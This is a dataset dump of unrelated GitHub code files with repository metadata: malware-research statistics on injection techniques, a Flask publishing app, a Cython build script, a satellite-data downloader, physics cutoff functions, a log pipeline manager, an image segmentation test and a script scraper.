\"upatre\",\n \"virut\",\n \"delf\",\n \"kolabc\",\n \"vobfus\",\n \"wapomi\",\n \"wabot\",\n \"vindor\",\n \"allaple\",\n \"gator\",\n \"hematite\",\n \"vtflooder\",\n \"shipup\",\n \"gepys\",\n]\ntop_families = {n:f for n,f in families.items() if n in top_family_names}\n\nother = FamilyStatistics(\"Other\")\nfor name, family in families.items():\n if name in top_families:\n continue\n other.included_samples.update(family.included_samples)\n other.positive_samples.update(family.positive_samples)\n\nother.included_samples.update(unclassified.included_samples)\nother.positive_samples.update(unclassified.positive_samples)\n\ndef print_family_stats(family):\n short_names = {\n \"Process Hollowing\": \"Hollow\",\n \"Thread Hijacking\": \"Thread\",\n \"CTray VTable\": \"CTray\",\n \"APC Shell Injection\": \"APCShl\",\n \"APC DLL Injection\": \"APCDll\",\n \"Generic Shell Injection\": \"Shell\",\n \"Classic DLL Injection\": \"DLL\",\n \"Shim Injection\": \"Shim\",\n \"Image File Execution Options\": \"IFEO\",\n \"AppInit DLL Injection\": \"AppInit\",\n \"AppCertDlls Injection\": \"AppCert\",\n \"COM Hijack DLL Injection\": \"COM\",\n \"SetWindowsHookEx DLL Injection\": \"WinHook\"\n }\n\n print(f\"{family.name:>17} & {len(family.included_samples):>5} & {family.get_positive_rate()*100:>6.2f}\\\\% & {short_names.get(family.get_preferred_behavior()) or family.get_preferred_behavior() or ' ':>7} &\")\n\n\n#for _, family in sorted(top_families.items(), key=lambda x: -len(x[1].included_samples)):\nfor name in top_family_names:\n print_family_stats(top_families.get(name) or FamilyStatistics(name))\nprint_family_stats(other)\n\nprint(\"\")\nprint(f\"{'Technique':>30} Nr of Families Frac of positive families\")\nfor b, fs in sorted(behavior_to_families.items(), key=lambda x: -len(x[1])):\n sorted_fs = sorted(fs, key=lambda x: -len(x.included_samples))\n s = \", \".join(f.name for f in sorted_fs if not f.is_singleton())\n print(f\"{b:>30}: {len(fs):>14} {len(fs)*100.0/counts_at_least_one:>26.2f}%\")\n\nprint(\"\")\n", "repo_name": "utwente-scs/code-injection-malware", "sub_path": "src/scripts/calculate_stats.py", "file_name": "calculate_stats.py", "file_ext": "py", "file_size_in_byte": 13777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 112, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 114, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 137, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 137, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 148, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 148, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 170, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "sys.stderr.write", "line_number": 231, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 231, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 232, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 234, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 235, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 235, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 236, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 239, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 247, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 247, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 248, "usage_type": "call"}]} +{"seq_id": "73723862045", "text": "import os\r\nimport requests\r\nimport json\r\nfrom storyutils import *\r\nfrom datetime import datetime, timedelta, date\r\nfrom collections import OrderedDict\r\nfrom flask import Flask, jsonify, request\r\napp = Flask(__name__)\r\n\r\n\r\nstory_api = os.environ['EC_STORY_API']\r\nstory_api_token = os.environ['EC_API_TOKEN']\r\nstory_author_id = os.environ['STORY_AUTHOR_ID']\r\nstory_owner = os.environ['STORY_OWNER']\r\n\r\nauth_header = {\"Authorization\": \"Bearer \" + story_api_token}\r\n\r\nelements = []\r\n\r\nelements.append([\"Test de publica\", \"DISTRITOS CALLAO CALLAO CERCADO\"])\r\n\r\n@app.route(\"/elections\")\r\ndef elections():\r\n now = datetime.now()\r\n dateStory = now-timedelta(days=30)\r\n draftUri = story_api + \"/draft/v1/story\"\r\n\r\n dataStory = {\"creationDate\": dateStory, \"story_author_id\": story_author_id, \"story_owner\": story_owner}\r\n i = 0\r\n # for region in elements:\r\n # for element in region:\r\n # dataStory[\"title\"] = element\r\n # ans = getANSElectionsStory(dataStory)\r\n # draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n # document= json.loads(draftResponse.text)\r\n\r\n # print(element + \": \" + document[\"id\"])\r\n # i += 1\r\n ans = getANSTaggedStory(dataStory)\r\n draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n document= json.loads(draftResponse.text)\r\n\r\n print(\"=> \" + document[\"id\"])\r\n\r\n return \"Finish\"\r\n\r\n@app.route(\"/test\")\r\ndef test():\r\n stories = [{\"title\": \"Titular de Peru21\", \"tags\": [\r\n {\r\n \"description\": \"Tag nuevo 1\",\r\n \"slug\": \"tag-nuevo-1\",\r\n \"text\": \"Tag nuevo 1\"\r\n },\r\n {\r\n \"description\": \"Prueba de Walter\",\r\n \"slug\": \"prueba-de-walter\",\r\n \"text\": \"PRueba de Walter\"\r\n },\r\n ]}, \r\n {\"title\": \"Prueba de historia Trome\", \"tags\": [\r\n {\r\n \"description\": \"Año Nuevo\",\r\n \"slug\": \"ano-nuevo\",\r\n \"text\": \"Año Nuevo\"\r\n },\r\n {\r\n \"description\": \"Sergio Castellón\",\r\n \"slug\": \"sergio-castellon\",\r\n \"text\": \"Sergio Castellón\"\r\n },\r\n ]}\r\n ]\r\n\r\n\r\n\r\n now = datetime.now()\r\n dateStory = now-timedelta(days=30)\r\n draftUri = story_api + \"/draft/v1/story\"\r\n\r\n dataStory = {\"creationDate\": dateStory, \"story_author_id\": story_author_id, \"story_owner\": story_owner}\r\n for element in stories:\r\n dataStory[\"title\"] = element[\"title\"]\r\n dataStory[\"tags\"] = element[\"tags\"]\r\n ans = getANSStory(dataStory)\r\n draftResponse = requests.request(\"POST\", draftUri, headers=auth_header, data=json.dumps(ans))\r\n document= json.loads(draftResponse.text)\r\n\r\n print(element[\"title\"] + \": \" + document[\"id\"])\r\n\r\n return \"Finish 2\"", "repo_name": "ljbustamante/arc-publisher", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3047, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 77, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 77, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "37719176918", "text": "#! /usr/bin/python\n\"\"\"\npython项目编译脚本\nusage: ./compiler path/to/project n\n 其中n是编译进程数量,默认为机器的核心数\nexample: ./compiler.py ./data-exchange-platform/ 256\n\"\"\"\nimport os\nimport signal\nimport sys\nfrom multiprocessing import cpu_count, Pool\n\nignored = [\"migrations\", '__init__.py', 'manage.py']\n\n\ndef dir_travel(path):\n \"\"\"遍历目录\"\"\"\n for root, dirs, files in os.walk(path):\n for file in files:\n yield root, file\n\n\ndef batch_compiler(path, process):\n \"\"\"整体处理逻辑\"\"\"\n backup_dir(path) # 备份项目目录\n install_cython()\n process_pool = Pool(processes=process)\n for root, file in dir_travel(path):\n process_pool.apply_async(compile_path, (root, file), error_callback=throw_error)\n process_pool.close()\n process_pool.join()\n rm_build()\n\n\ndef throw_error(e):\n print(\"~~~~~~~~~~~~~~~~COMPILER ERROR~~~~~~~~~~~~~~~~~~\", e.__cause__)\n os.killpg(os.getpgid(os.getpid()), signal.SIGKILL)\n\n\ndef compile_path(root, file):\n try:\n if root.endswith(\"migrations\") or file in ignored:\n return\n\n if file.endswith(\".py\"):\n # 项目内部目录路径 组成字符串 用于标识不同路径下的同名文件\n unique_path = \"_\".join([\"_\".join(root.strip(\"./\").split(\"/\")[1:]), file[:-3]])\n file_path = os.path.join(root, file) # 文件全路径或相对当前目录的路径\n print(\"current filename: \", file_path)\n adjust_script_content(file_path, unique_path) # 修改setup.py最后一行中的文件名\n compile_file(unique_path) # 编译文件\n rm_file(file_path) # 删除py文件\n move_so_to(file, root, unique_path) # 将so文件从build目录移到py文件目录\n except Exception as e:\n print(e)\n raise e\n\n\ndef compile_file(unique_path):\n \"\"\"编译为so文件\"\"\"\n cmd = f\"\"\"python {unique_path}_setup.py build_ext\"\"\"\n os.system(cmd)\n\n\ndef move_so_to(file, root, unique_path):\n \"\"\"file是原文件名,root是目标路径,unique_path用于区分不同路径下的同名文件\"\"\"\n if not os.path.isdir(root):\n raise Exception(f\"{root}不是目录\")\n file = file[:-3] # 删除.py\n source = search_file(file, unique_path)\n # source = f\"./build/lib.linux-x86_64-3.6/{new_path}/{file}.*.so\"\n destination = f\"{root}/{file}.so\"\n cmd = f\"\"\"mv {source} {destination}\"\"\"\n os.system(cmd)\n c_file = os.path.join(root, file + \".c\")\n cmd = f\"\"\"rm {c_file}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"rm {unique_path}_setup.py\"\"\"\n os.system(cmd)\n\n\ndef search_file(target, unique_path):\n root = \"./build\"\n # 第一遍按匹配目标路径\n for dir_name, file in dir_travel(root):\n u_path = \"_\".join([dir_name.strip(\"./\").replace(\"/\", \"_\"), file])\n if file.endswith(\".so\") and file.startswith(target) and unique_path in u_path:\n return os.path.join(dir_name, file)\n # 第二遍全局搜索\n for dir_name, file in dir_travel(root):\n if file.endswith(\".so\") and file.startswith(target):\n return os.path.join(dir_name, file)\n\n raise Exception(f\"未找到文件{target}, unique_path {unique_path}\")\n\n\ndef file_exists_in_path(file, path):\n \"\"\"查找当前目录及其父级目录中是否存在特定文件\"\"\"\n path = path.strip(\"./\")\n if os.path.exists(\"/\".join([path, file])):\n return True\n return False\n\n\ndef adjust_script_content(file_path, unique_path):\n \"\"\"两处文件需要修改\"\"\"\n adjust_setup(file_path, unique_path)\n adjust_file_header(file_path)\n\n\ndef adjust_file_header(file_path):\n \"\"\"在文件头部加上一行指定解释器版本\"\"\"\n cmd = f\"\"\"sed -i '1i\\# cython: language_level=3' {file_path}\"\"\"\n os.system(cmd)\n\n\ndef adjust_setup(file_path, unique_path):\n \"\"\"将第三行中的文件名替换为当前文件名\"\"\"\n cmd = f\"\"\"echo \"from distutils.core import setup\nfrom Cython.Build import cythonize\nsetup(ext_modules=cythonize(['{file_path}']))\n\" > {unique_path}_setup.py\"\"\"\n os.system(cmd)\n\n\ndef rm_file(file_path):\n \"\"\"删除py文件\"\"\"\n os.remove(file_path)\n\n\ndef backup_dir(path):\n cmd = f\"\"\"rm /tmp/{path}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"cp -r {path} /tmp/{path}\"\"\"\n os.system(cmd)\n\n\ndef restore_dir(path):\n cmd = f\"\"\"rm -rf {path}\"\"\"\n os.system(cmd)\n cmd = f\"\"\"mv {path}_backup {path}\"\"\"\n os.system(cmd)\n\n\ndef rm_build():\n cmd = f\"\"\"rm -rf build\"\"\"\n os.system(cmd)\n cmd = f\"\"\"rm -f setup.py\"\"\"\n os.system(cmd)\n\n\ndef execute_command(cmd):\n os.popen(cmd)\n\n\ndef install_cython():\n cmd = \"pip install Cython -i https://pypi.doubanio.com/simple/\"\n os.system(cmd)\n\n\nif __name__ == '__main__':\n path_ = sys.argv[1]\n n = cpu_count()\n if len(sys.argv) > 2:\n n = int(sys.argv[2])\n batch_compiler(path_, n)\n", "repo_name": "super-tramper/python_compiler", "sub_path": "compiler.py", "file_name": "compiler.py", "file_ext": "py", "file_size_in_byte": 4877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 27, "usage_type": "call"}, {"api_name": "os.killpg", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpgid", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 37, "usage_type": "call"}, {"api_name": "signal.SIGKILL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}, {"api_name": "os.system", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 114, "usage_type": "call"}, {"api_name": "os.system", "line_number": 123, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 128, "usage_type": "call"}, {"api_name": "os.system", "line_number": 133, "usage_type": "call"}, {"api_name": "os.system", "line_number": 135, "usage_type": "call"}, {"api_name": "os.system", "line_number": 140, "usage_type": "call"}, {"api_name": "os.system", "line_number": 142, "usage_type": "call"}, {"api_name": "os.system", "line_number": 147, "usage_type": "call"}, {"api_name": "os.system", "line_number": 149, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 153, "usage_type": "call"}, {"api_name": "os.system", "line_number": 158, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 162, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 163, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 164, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 165, "usage_type": "attribute"}]} +{"seq_id": "37039612978", "text": "import s3fs\nimport numpy as np\nimport datetime as dt\n\n\ndef to_julian_day(year, month, day): \n date = dt.datetime.strptime('%d-%d-%d'%(year,month, day), '%Y-%m-%d') \n return str(date.timetuple().tm_yday).zfill(3)\n\n\ndef downloadABI(**kargs):\n if kargs.get('day'):\n day = kargs.get('day')\n if kargs.get('month'):\n month = kargs.get('month')\n if kargs.get('year'):\n year = kargs.get('year')\n \n julian_day = to_julian_day(year, month, day)\n bucket = 'noaa-goes17/ABI-L2-CMIPF' \n query = aws.ls('%s/%d/%s'%(bucket, year, julian_day))\n \n \n hours = np.array(query) \n\n for hour in hours:\n files = aws.ls(hour)\n for file in files:\n print('Downloading %s...'%file.split('/')[-1])\n aws.get(file, file.split('/')[-1]) \n# fs.get(files[0], files[0].split('/')[-1])\n\n# print(files)\n\n\nif __name__ == \"__main__\":\n DAY=1\n MONTH=1\n YEAR=2019\n aws = s3fs.S3FileSystem(anon=True) \n\n downloadABI(day=DAY, month=MONTH, year=YEAR)\n", "repo_name": "AdrianoPereira/cap378", "sub_path": "downloadgoes.py", "file_name": "downloadgoes.py", "file_ext": "py", "file_size_in_byte": 1050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "s3fs.S3FileSystem", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "7024447822", "text": "import math\nimport torch\n\n\n@torch.jit.script\ndef cosine_cutoff(x: torch.Tensor, r_max: torch.Tensor, r_start_cos_ratio: float = 0.8):\n \"\"\"A piecewise cosine cutoff starting the cosine decay at r_decay_factor*r_max.\n\n Broadcasts over r_max.\n \"\"\"\n r_max, x = torch.broadcast_tensors(r_max.unsqueeze(-1), x.unsqueeze(0))\n r_decay: torch.Tensor = r_start_cos_ratio * r_max\n # for x < r_decay, clamps to 1, for x > r_max, clamps to 0\n x = x.clamp(r_decay, r_max)\n return 0.5 * (torch.cos((math.pi / (r_max - r_decay)) * (x - r_decay)) + 1.0)\n\n\n@torch.jit.script\ndef polynomial_cutoff(\n x: torch.Tensor, r_max: torch.Tensor, p: float = 6.0\n) -> torch.Tensor:\n \"\"\"Polynomial cutoff, as proposed in DimeNet: https://arxiv.org/abs/2003.03123\n\n\n Parameters\n ----------\n r_max : tensor\n Broadcasts over r_max.\n\n p : int\n Power used in envelope function\n \"\"\"\n assert p >= 2.0\n r_max, x = torch.broadcast_tensors(r_max.unsqueeze(-1), x.unsqueeze(0))\n x = x / r_max\n\n out = 1.0\n out = out - (((p + 1.0) * (p + 2.0) / 2.0) * torch.pow(x, p))\n out = out + (p * (p + 2.0) * torch.pow(x, p + 1.0))\n out = out - ((p * (p + 1.0) / 2) * torch.pow(x, p + 2.0))\n\n return out * (x < 1.0)\n", "repo_name": "mir-group/allegro", "sub_path": "allegro/nn/cutoffs.py", "file_name": "cutoffs.py", "file_ext": "py", "file_size_in_byte": 1247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 244, "dataset": "github-code", "pt": "88", "api": [{"api_name": "torch.Tensor", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.broadcast_tensors", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.cos", "line_number": 15, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.jit", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.broadcast_tensors", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.pow", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.jit", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "36441623229", "text": "\"\"\"This module contains functionality to manage pipelines via multi-processing.\"\"\"\n# pylint: disable=logging-fstring-interpolation\n\nimport logging\nimport logging.handlers\nimport multiprocessing\n\nfrom logprep.framework.pipeline import MultiprocessingPipeline\nfrom logprep.util.configuration import Configuration\nfrom logprep.util.prometheus_exporter import PrometheusStatsExporter\n\n\nclass PipelineManagerError(Exception):\n \"\"\"Base class for pipeline related exceptions.\"\"\"\n\n\nclass MustSetConfigurationFirstError(PipelineManagerError):\n \"\"\"Raise if configuration was not set.\"\"\"\n\n def __init__(self, what_failed: str):\n super().__init__(f\"Failed to {what_failed}: Configuration is unset\")\n\n\nclass PipelineManager:\n \"\"\"Manage pipelines via multi-processing.\"\"\"\n\n def __init__(self):\n self.prometheus_exporter = None\n self._logger = logging.getLogger(\"Logprep PipelineManager\")\n self.log_queue = multiprocessing.Queue(-1)\n self._queue_listener = logging.handlers.QueueListener(self.log_queue)\n self._queue_listener.start()\n\n self._pipelines = []\n self._configuration = None\n\n self._lock = multiprocessing.Lock()\n self._shared_dict = None\n self._used_server_ports = None\n\n def set_configuration(self, configuration: Configuration):\n \"\"\"set the verified config\"\"\"\n self._configuration = configuration\n\n manager = multiprocessing.Manager()\n self._shared_dict = manager.dict()\n self._used_server_ports = manager.dict()\n for idx in range(configuration.get(\"process_count\", 1)):\n self._shared_dict[idx] = None\n prometheus_config = configuration.get(\"metrics\", {})\n if prometheus_config.get(\"enabled\", False):\n self.prometheus_exporter = PrometheusStatsExporter(prometheus_config, self._logger)\n\n def get_count(self) -> int:\n \"\"\"Get the pipeline count.\n\n Parameters\n ----------\n count : int\n The pipeline count will be incrementally changed until it reaches this value.\n\n \"\"\"\n self._logger.debug(f\"Getting pipeline count: {len(self._pipelines)}\")\n return len(self._pipelines)\n\n def set_count(self, count: int):\n \"\"\"Set the pipeline count.\n\n Parameters\n ----------\n count : int\n The pipeline count will be incrementally changed until it reaches this value.\n\n \"\"\"\n if count < len(self._pipelines):\n self._decrease_to_count(count)\n else:\n self._increase_to_count(count)\n\n def _increase_to_count(self, count: int):\n while len(self._pipelines) < count:\n new_pipeline_index = len(self._pipelines) + 1\n self._pipelines.append(self._create_pipeline(new_pipeline_index))\n self._pipelines[-1].start()\n\n def _decrease_to_count(self, count: int):\n while len(self._pipelines) > count:\n pipeline = self._pipelines.pop()\n pipeline.stop()\n pipeline.join()\n\n def restart_failed_pipeline(self):\n \"\"\"Remove one pipeline at a time.\"\"\"\n failed_pipelines = [pipeline for pipeline in self._pipelines if not pipeline.is_alive()]\n for failed_pipeline in failed_pipelines:\n self._pipelines.remove(failed_pipeline)\n if self.prometheus_exporter is None:\n continue\n self.prometheus_exporter.remove_metrics_from_process(failed_pipeline.pid)\n\n if failed_pipelines:\n self.set_count(self._configuration.get(\"process_count\"))\n self._logger.warning(f\"Restarted {len(failed_pipelines)} failed pipeline(s)\")\n\n def stop(self):\n \"\"\"Stop processing any pipelines by reducing the pipeline count to zero.\"\"\"\n self._decrease_to_count(0)\n\n def _create_pipeline(self, index) -> MultiprocessingPipeline:\n if self._configuration is None:\n raise MustSetConfigurationFirstError(\"create new pipeline\")\n\n self._logger.info(\"Created new pipeline\")\n return MultiprocessingPipeline(\n pipeline_index=index,\n config=self._configuration,\n log_queue=self.log_queue,\n lock=self._lock,\n shared_dict=self._shared_dict,\n used_server_ports=self._used_server_ports,\n prometheus_exporter=self.prometheus_exporter,\n )\n", "repo_name": "fkie-cad/Logprep", "sub_path": "logprep/framework/pipeline_manager.py", "file_name": "pipeline_manager.py", "file_ext": "py", "file_size_in_byte": 4383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.handlers.QueueListener", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "multiprocessing.Lock", "line_number": 37, "usage_type": "call"}, {"api_name": "logprep.util.configuration.Configuration", "line_number": 41, "usage_type": "name"}, {"api_name": "multiprocessing.Manager", "line_number": 45, "usage_type": "call"}, {"api_name": "logprep.util.prometheus_exporter.PrometheusStatsExporter", "line_number": 52, "usage_type": "call"}, {"api_name": "logprep.framework.pipeline.MultiprocessingPipeline", "line_number": 114, "usage_type": "call"}, {"api_name": "logprep.framework.pipeline.MultiprocessingPipeline", "line_number": 109, "usage_type": "name"}]} +{"seq_id": "22912184841", "text": "import cv2\nfrom segment_anything import SamPredictor, sam_model_registry, SamAutomaticMaskGenerator\nimport argparse\nimport json\nimport os\nimport numpy as np\nimport torch\nfrom typing import Any, Dict, List\n\ndef write_masks_to_folder(masks: List[Dict[str, Any]], path: str) -> None:\n header = \"id,area,bbox_x0,bbox_y0,bbox_w,bbox_h,point_input_x,point_input_y,predicted_iou,stability_score,crop_box_x0,crop_box_y0,crop_box_w,crop_box_h\" # noqa\n metadata = [header]\n for i, mask_data in enumerate(masks):\n mask = mask_data[\"segmentation\"]\n filename = f\"{i}.png\"\n cv2.imwrite(os.path.join(path, filename), mask * 255)\n mask_metadata = [\n str(i),\n str(mask_data[\"area\"]),\n *[str(x) for x in mask_data[\"bbox\"]],\n *[str(x) for x in mask_data[\"point_coords\"][0]],\n str(mask_data[\"predicted_iou\"]),\n str(mask_data[\"stability_score\"]),\n *[str(x) for x in mask_data[\"crop_box\"]],\n ]\n row = \",\".join(mask_metadata)\n metadata.append(row)\n metadata_path = os.path.join(path, \"metadata.csv\")\n with open(metadata_path, \"w\") as f:\n f.write(\"\\n\".join(metadata))\n\n return\n\n\nimage = cv2.imread('img_00024.jpg')\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# with open('../viewerout/landmarks/img_00024.json') as f:\n# data = json.load(f) \n# lanndmarks3D =np.array(data['frontLandmarks3d'])\n# lanndmarks2D = lanndmarks3D[:,0:2].astype(int)\n# promptPts0=lanndmarks2D\n# promptLabels0=np.ones(promptPts0.shape[0],dtype=int) \n \n\n\nsam = sam_model_registry[\"vit_h\"](checkpoint=\"sam_vit_h_4b8939.pth\")\npredictor = SamPredictor(sam)\npredictor.set_image(image)\n\npromptPts0=np.array([[364,254],[456,289]])\npromptLabels0=np.array([1,1])\ninput_box = np.array([278,192, 472,459])\n\nmasks, scores, logits = predictor.predict(promptPts0,promptLabels0,box=input_box[None, :]) \nprint('scores=',scores) \ncv2.imwrite(\"00.png\", masks[0] * 255)\ncv2.imwrite(\"01.png\", masks[1] * 255) \ncv2.imwrite(\"02.png\", masks[2] * 255) \n\n#mask_generator = SamAutomaticMaskGenerator(sam)\n#masks = mask_generator.generate(image)\n#write_masks_to_folder(masks,'./1')\n\n\n \n", "repo_name": "calipos/mvs_mvg_bat", "sub_path": "segmentAnything/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 10, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 36, "usage_type": "attribute"}, {"api_name": "segment_anything.sam_model_registry", "line_number": 46, "usage_type": "name"}, {"api_name": "segment_anything.SamPredictor", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "37018754749", "text": "#importing modules\n\nfrom bs4 import BeautifulSoup\n\nimport time\n\nfrom time import sleep\n\nimport requests\n\nimport csv\n\nimport os\n\n#function to make requests\n\ndef makerequest(url):\n\n\t#making a request\n\n\tpage = requests.get( url )\n\n\t#checking for 429 response\n\n\tif page.status_code == 429:\n\n\t\tprint('429 error ! trying again after' + page.headers[\"Retry-After\"] + 'seconds')\n\n\t\ttime.sleep(int(page.headers[\"Retry-After\"]))\n\n\t\tpage = requests.get( url )\n\n\treturn(page)\n\n#function to import js url's in a given url\n\ndef jsurl(url):\n\t\n\tpage = makerequest(url)\n\n\tsoup = BeautifulSoup(page.content , 'html.parser')\n\n\tprint(soup.prettify())\n\n\tjsurl = soup.find_all('script')\n\n\tprint(jsurl.prettify())\n\n\treturn(jsurl)\n\n\n#main function\n\ndef main():\n\n\tinputurl = input('\\nEnter the url : ')\n\n\tscrappedurls = jsurl(inputurl)\n\n\tprint(scrappedurls)\n\nmain()", "repo_name": "santhosh-duraipandiyan/Python_Scripts", "sub_path": 